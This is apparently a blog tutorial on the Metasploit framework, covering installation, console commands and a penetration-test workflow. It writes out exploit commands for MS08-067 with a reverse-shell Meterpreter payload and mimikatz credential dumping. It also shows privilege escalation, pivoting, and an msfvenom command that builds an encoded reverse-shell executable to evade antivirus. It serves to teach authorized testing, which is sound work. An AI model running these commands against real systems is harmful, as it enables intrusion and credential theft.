<- Back

Basic Guide to Metasploit

March 19, 2024
Metasploit console with vulnerability scan and exploit modules
Metasploit msfconsole scanning a network for vulnerabilities

What Is Metasploit?

Metasploit is a modular, open-source framework designed to help security professionals and ethical hackers discover, validate, and exploit vulnerabilities in remote systems. Originally created in Ruby by HD Moore in 2003, it has grown into the industry standard for penetration testing, offering:

  • Exploits that leverage security flaws in software
  • Payloads (like Meterpreter) that run on compromised hosts
  • Auxiliary modules for scanning, fuzzing, and reconnaissance
  • Post-exploitation tools to pivot, escalate privileges, and gather evidence

Because Metasploit abstracts the gritty details of exploit development, you can focus on methodology and strategy rather than reinventing low-level code.

Core Components

Understanding Metasploit’s building blocks will help you navigate the framework more efficiently:

msfconsole

  • What it is: The command-line interface for interacting with the framework.
  • Why it matters: Central hub for searching modules, configuring options, launching attacks, and managing sessions.

Module Types

  • Exploit: Code that triggers a vulnerability (e.g., exploit/windows/smb/ms17_010_eternalblue).
  • Payload: Code delivered by an exploit (e.g., windows/x64/meterpreter/reverse_tcp). Meterpreter is the gold standard payload-lightweight, extensible, and scriptable.
  • Auxiliary: Non-exploit tools (scanners, sniffers, fuzzers). Example: auxiliary/scanner/ssh/ssh_version.
  • Post: Actions to run on a compromised host (gather credentials, escalate privileges, pivot). Example: post/windows/gather/credentials/mimikatz.

msfvenom

  • What it is: A standalone utility for crafting custom payloads and shellcode.
  • Use cases: Generate bind/reverse shells, encode payloads to evade antivirus, export to different formats (exe, elf, raw).

Installing Metasploit

Metasploit is pre-installed on Kali Linux, but you can also install it on other platforms:

Kali Linux

sudo apt update && sudo apt install metasploit-framework

Kali’s rolling-release model ensures you get the latest modules and features.

Ubuntu/Debian

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/
   config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
sudo ./msfinstall

After installation, run msfconsole to verify.

Windows (via WSL)

  1. Enable WSL and install Ubuntu from the Microsoft Store.
  2. Follow the Ubuntu steps above inside your WSL shell.
  3. Use msfconsole inside WSL or integrate with Windows Terminal.

First Steps in msfconsole

Launch:

msfconsole

You’ll see a banner and the msf > prompt. Key starter commands:

  • search name:<keyword> - find modules by name or description.
  • info <module> - view options, targets, and references for a module.
  • use <module> - select a module for configuration.
  • set <option> <value> - configure parameters (e.g., set RHOSTS 10.0.0.5).
  • show options - list required and optional settings.
  • run or exploit - execute the configured module.
  • sessions -l - list active Meterpreter or shell sessions.

The Penetration-Test Workflow

A typical engagement follows a structured methodology:

Reconnaissance & Scanning

Use auxiliary modules to map your target:

use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.0.0/24
set THREADS 50
run

Next, enumerate services:

use auxiliary/scanner/ssh/ssh_version
set RHOSTS 10.0.0.5
run

Gathering banners and versions informs which exploits to try.

Selecting & Configuring an Exploit

Once you identify a vulnerable service, choose the matching exploit:

search ms08_067
use exploit/windows/smb/ms08_067_netapi

Configure target and payload:

set RHOST 10.0.0.5
set LHOST 10.0.0.10
set PAYLOAD windows/meterpreter/reverse_tcp
show targets
set TARGET 0
exploit

Meterpreter session opens on success.

Post-Exploitation

With Meterpreter up, you can:

  • Browse the filesystem: ls, cd C:\\Users\\Public
  • Dump credentials: run post/windows/gather/credentials/mimikatz
  • Privilege escalation: run post/windows/escalate/getsystem
  • Pivoting: Configure SOCKS proxy with run post/multi/manage/socks_proxy and route further scans through the compromised host.

Advanced Techniques

msfvenom Payload Crafting

Generate an encoded reverse shell to bypass simple antivirus rules:

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.0.0.10 LPORT=4444 -f exe -e x86/shikata_ga_nai \
  -i 5 -o shell_obf.exe
  • -e: encoder
  • -i: iterations

Database Integration

Persist your findings across sessions:

  1. Start PostgreSQL and Metasploit’s database:

    sudo systemctl start postgresql
msfdb init
  2. In msfconsole, verify with db_status.
  3. Use hosts, services, and vulns commands to track assets and findings.

Resource Scripts

Automate repetitive tasks with .rc files:

# quick_scan.rc
workspace -a clientA
db_nmap -sV 10.0.0.0/24
vulns

Then in msfconsole:

resource quick_scan.rc

Best Practices & Ethical Considerations

  • Written Consent: Always have a signed authorization before testing.
  • Isolation: Conduct tests in a controlled lab or isolated network to avoid collateral damage.
  • Logging & Reporting: Keep detailed notes (Metasploit’s loot files, module output) and produce clear, actionable reports.
  • Stay Updated: Regularly update both Metasploit and your OS to access the latest modules and protect your attack machine.
  • Clean Up: Remove any persistent backdoors or listeners you’ve installed to leave the target in its original state.

Troubleshooting Tips

  • Module Fails to Load? Run msfupdate or reinstall the framework.
  • Stuck on “Loading Plugins”? Delete ~/.msf4 and let Metasploit regenerate its configuration.
  • Slow Console Performance? Disable unwanted plugins (load none) or switch to a lighter terminal emulator.

Learning Resources

Next Steps

  1. Build a Home Lab: Spin up VMs with vulnerable services (Metasploitable, OWASP Broken Web Apps).
  2. Script Your Workflows: Write custom auxiliary modules in Ruby to automate niche tasks.
  3. Contribute: Submit new modules or bug fixes to the Metasploit GitHub repository.

Metasploit is a gateway to endless learning in cybersecurity. By mastering its modules, workflows, and best practices, you’ll be well on your way to becoming an effective, responsible penetration tester.

↑ Back To Top